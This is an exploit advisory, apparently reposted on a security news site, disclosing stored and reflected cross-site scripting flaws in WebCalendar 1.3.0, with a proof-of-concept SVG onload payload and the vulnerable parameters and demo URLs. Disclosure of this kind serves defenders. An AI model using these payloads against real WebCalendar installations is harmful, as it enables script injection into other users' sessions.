Home Tools Exploits & CVE's WebCalendar 1.3.0 Cross Site Scripting

WebCalendar 1.3.0 Cross Site Scripting

January 7, 2024

139

Authored by tmrswrr

WebCalendar version 1.3.0 suffers from reflective and persistent cross site scripting vulnerabilities.

# Exploit Title: WebCalendar  Version: 1.3.0 - Stored XSS - Reflected XSS 
# Date: 2024-3-1
# Exploit Author: tmrswrr
# Vendor Homepage: http://www.k5n.us/webcalendar.php
# Version: 1.3.0
# Tested on: https://www.softaculous.com/apps/calendars/WebCalendar

## Stored XSS

1 ) Write Events > Add New Events > Brief Description : https://demos2.softaculous.com/WebCalendarvqsmnseug2/edit_entry.php?year=2024&month=01&day=03    
    this payload : <sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will bee alert button : https://demos2.softaculous.com/WebCalendarvqsmnseug2/month.php


=============================================================================================

## Reflected XSS

1 ) Go to this url and write payload : https://demos2.softaculous.com/WebCalendarvqsmnseug2/colors.php?color="><sVg/onLy=1 onLoaD=confirm(1)//   
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button 


==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload users parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=admin&form=editentryform&year=2024&month=1&day=3
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/availability.php?users=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&form=editentryform&year=2024&month=1&day=3

==============================================================================================

## Reflected XSS

1 ) Go to this url and write payload fday parameter : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year%27&date=20240201
    Payload : "><sVg/onLy=1 onLoaD=confirm(1)//
2 ) You will be see alert button : https://demos2.softaculous.com/WebCalendarkvopnvsb9s/datesel.php?form=editentryform&fday=%22%3E%3CsVg/onLy=1%20onLoaD=confirm(1)//&fmonth=rpt_month&fyear=rpt_year%27&date=20240201


===============================================================================================

WebCalendar 1.3.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Windows PspBuildCreateProcessContext Double-Fetch / Buffer Overflow

Online Tours And Travels Management System 1.0 SQL Injection

Packet Storm New Exploits For April, 2024

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Adiscon LogAnalyzer 4.1.5 Cross Site Scripting

Arm Mali CSF VMA Split Mishandling

Backdoor.Win32.Prexot.a Authentication Bypass